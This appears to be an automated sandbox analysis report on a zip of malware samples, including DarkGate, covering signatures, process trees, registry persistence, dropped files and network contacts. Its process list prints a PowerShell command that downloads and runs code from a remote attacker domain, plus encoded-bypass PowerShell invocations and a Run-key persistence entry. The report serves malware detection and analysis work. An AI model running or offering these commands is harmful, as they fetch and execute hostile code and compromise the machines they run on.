Analysis Overview
SHA256
9e8edbacb53fe27d3723151ab2d6ed203473edf666caebfab7dbf442bd68d463
Threat Level: Known bad
The file New Compressed (zipped) Folder.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
DarkGate
Blocklisted process makes network request
Downloads MZ/PE file
Requests dangerous framework permissions
Executes dropped EXE
Loads dropped DLL
Enumerates connected drives
Adds Run key to start application
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Modifies registry class
Checks processor information in registry
Modifies data under HKEY_USERS
Enumerates system info in registry
Modifies system certificate store
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-17 20:16
Signatures
Requests dangerous framework permissions
| Description | Indicator | Process | Target |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-17 20:15
Reported
2023-11-17 20:21
Platform
win10-20231025-en
Max time kernel
273s
Max time network
314s
Command Line
Signatures
DarkGate
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4060 created 420 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\system32\DllHost.exe |
| PID 4060 created 764 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\system32\fontdrvhost.exe |
| PID 4060 created 2940 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\System32\Conhost.exe |
| PID 4060 created 1648 | N/A | C:\tepp\AutoIt3.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe |
| PID 4060 created 1512 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\system32\wbem\wmiprvse.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\tepp\AutoIt3.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\Users\\Admin\\AppData\\Roaming\\BraveCrashHandler.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates connected drives
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI5594.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e58efba.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF150.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF366.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3EEE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e58efba.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF422.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{1C305533-9700-4743-83AA-EEF0896C4929} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF54C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF628.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF986.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7EF7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI68FD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF2D8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF723.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF956.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1879.tmp | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\tepp\AutoIt3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\tepp\AutoIt3.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133447259646841693" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\New Compressed (zipped) Folder.zip"
C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap24083:256:7zEvent10066 -tzip -sae -- "C:\Users\Admin\Desktop\New Compressed (zipped) Folder\c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde.zip"
C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe
"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C9345F958E073D9A352901F311135479 C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\FreeSoftPlace\2023.11.06\96C4929\FreeSoftPlace.msi MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH="C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe" SETUPEXEDIR="C:\Users\Admin\Desktop\New Compressed (zipped) Folder\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1700011584 " AI_EUIMSI=""
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6FC05007F91D76C17A3DADA8AA1B62F4
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssFAE8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiFAD6.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrFAD7.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrFAE7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc
C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\Desktop\New Compressed (zipped) Folder\e12d6a7452dd56cfb058ac5a364f0d008870b900b0da53b12c0c58f782488924.exe
"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\e12d6a7452dd56cfb058ac5a364f0d008870b900b0da53b12c0c58f782488924.exe"
C:\Users\Admin\Desktop\New Compressed (zipped) Folder\a8eabecac5183dd92d96c18f8b08b41e60c301261e378238f88f260ec5943264.exe
"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\a8eabecac5183dd92d96c18f8b08b41e60c301261e378238f88f260ec5943264.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1BA4.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi1B92.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr1B93.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr1B94.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss448E.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi448B.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr448C.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr448D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss577F.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi577C.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr577D.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr577E.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc [encoded command omitted]
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6BB8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6BA5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6BA6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6BA7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc [encoded command omitted]
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7F64.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7F51.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7F52.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7F53.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc [encoded command omitted]
C:\Windows\System32\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_wizard.zip\wizard.cpl",
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\Temp1_wizard.zip\wizard.cpl",
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument C:\Users\Admin\Desktop\New Compressed (zipped) Folder\86bb5e18da0ed3a8793cc3b38b57aa972a5d9ed0f07182712165f9703d81f27c.html
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffdb9109758,0x7ffdb9109768,0x7ffdb9109778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2032 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2912 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2904 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\New Compressed (zipped) Folder\c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri "http://faststroygo.com:80/jsslatecqpa");
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument C:\Users\Admin\Desktop\New Compressed (zipped) Folder\ff7953362998267e8554ee7880b215d42d460f12ff1cab773c9feb5c6225148b.html
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffdb9109758,0x7ffdb9109768,0x7ffdb9109778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4836 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:1
C:\tepp\AutoIt3.exe
"C:\tepp\AutoIt3.exe" latecqpa.au3
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\New Compressed (zipped) Folder\dc5a8c20ddad9edf5bad9885ccc751301b09ff0477a50fc90f1ce0a9f8283635.jar"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe 6c2fd9890091213f759f6cfe01fb00531a5efc4bdbad60542cabd86c1aabd9f2.dll
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Compressed (zipped) Folder\Cookies_decrypted
Network
| Country | Destination | Domain | Proto |
| RU | 62.173.141.118:445 | | tcp |
| US | 8.8.8.8:53 | 118.141.173.62.in-addr.arpa | udp |
| RU | 62.173.141.116:445 | | tcp |
| RU | 62.173.141.114:445 | | tcp |
| US | 8.8.8.8:53 | 116.141.173.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.141.173.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| RU | 62.173.141.118:445 | | tcp |
| RU | 62.173.141.116:445 | | tcp |
| RU | 62.173.141.114:445 | | tcp |
| US | 8.8.8.8:53 | 72.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s3.us-east-1.amazonaws.com | udp |
| US | 52.216.137.246:443 | s3.us-east-1.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 246.137.216.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.gyazo.com | udp |
| US | 104.18.24.163:443 | i.gyazo.com | tcp |
| US | 104.18.24.163:443 | i.gyazo.com | tcp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.24.18.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 48.101.122.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | crls.ssl.com | udp |
| US | 18.239.36.80:80 | crls.ssl.com | tcp |
| US | 8.8.8.8:53 | www.ssl.com | udp |
| US | 54.88.41.161:80 | www.ssl.com | tcp |
| US | 8.8.8.8:53 | 165.184.237.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.36.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.41.88.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | faststroygo.com | udp |
| RU | 84.201.174.17:80 | faststroygo.com | tcp |
| RU | 84.201.174.17:80 | faststroygo.com | tcp |
| US | 8.8.8.8:53 | 17.174.201.84.in-addr.arpa | udp |
| RU | 84.201.174.17:80 | faststroygo.com | tcp |
| US | 52.216.137.246:443 | s3.us-east-1.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 126.24.238.8.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\New Compressed (zipped) Folder\c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde.zip
C:\Users\Admin\AppData\Local\Temp\FreeSoftPlace\2023.11.06\96C4929\FreeSoftPlace.msi
C:\Users\Admin\AppData\Local\Temp\MSIEA0E.tmp
\Users\Admin\AppData\Local\Temp\MSIEA0E.tmp
C:\Users\Admin\AppData\Local\Temp\MSIEBA5.tmp
\Users\Admin\AppData\Local\Temp\MSIEBA5.tmp
C:\Users\Admin\AppData\Local\Temp\MSIEC52.tmp
\Users\Admin\AppData\Local\Temp\MSIEC52.tmp
C:\Users\Admin\AppData\Local\Temp\MSIECFF.tmp
\Users\Admin\AppData\Local\Temp\MSIECFF.tmp
C:\Windows\Installer\MSIF150.tmp
\Windows\Installer\MSIF150.tmp
C:\Windows\Installer\MSIF2D8.tmp
\Windows\Installer\MSIF2D8.tmp
C:\Windows\Installer\MSIF366.tmp
\Windows\Installer\MSIF366.tmp
C:\Windows\Installer\MSIF422.tmp
\Windows\Installer\MSIF422.tmp
C:\Windows\Installer\MSIF54C.tmp
\Windows\Installer\MSIF54C.tmp
C:\Windows\Installer\MSIF628.tmp
\Windows\Installer\MSIF628.tmp
C:\Windows\Installer\MSIF723.tmp
\Windows\Installer\MSIF723.tmp
C:\Windows\Installer\MSIF986.tmp
\Windows\Installer\MSIF986.tmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4qi5bzxe.1em.ps1
C:\Users\Admin\AppData\Local\Temp\pssFAE8.ps1
C:\Users\Admin\AppData\Local\Temp\scrFAD7.ps1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Windows\Installer\MSI1879.tmp
\Windows\Installer\MSI1879.tmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\pss1BA4.ps1
C:\Users\Admin\AppData\Local\Temp\scr1B93.ps1
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Windows\Installer\MSI3EEE.tmp
\Windows\Installer\MSI3EEE.tmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\pss448E.ps1
C:\Users\Admin\AppData\Local\Temp\scr448C.ps1
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
\Windows\Installer\MSI5594.tmp
C:\Windows\Installer\MSI5594.tmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\pss577F.ps1
C:\Users\Admin\AppData\Local\Temp\scr577D.ps1
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6d79111bebb38571adee23cff9cb836 |
| SHA1 | e91bd98f439584eec1fcd7b4a5d7f3f9aad864bb |
| SHA256 | 346224c55c21d7e4e011e608e1a80b8c748833b69ec7273e075440cb00e02efc |
| SHA512 | fc49c58eb2ba2e7599bf94bf09760a949b8951817657116b5d5701a688e80e7b79771fd8417ef03b73c06e3082823e3b76dff2d137dc9454a54e3bf2b4fc54dd |
memory/828-736-0x0000026A2F4D0000-0x0000026A2F4E0000-memory.dmp
memory/828-737-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp
\Windows\Installer\MSI68FD.tmp
C:\Windows\Installer\MSI68FD.tmp
C:\Users\Admin\AppData\Local\Temp\pss6BB8.ps1
C:\Users\Admin\AppData\Local\Temp\scr6BA6.ps1
C:\Windows\Installer\MSI7EF7.tmp
\Windows\Installer\MSI7EF7.tmp
C:\Users\Admin\AppData\Local\Temp\pss7F64.ps1
C:\Users\Admin\AppData\Local\Temp\scr7F52.ps1
\??\pipe\crashpad_2100_NOHUQUKXWOMSAQCZ
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1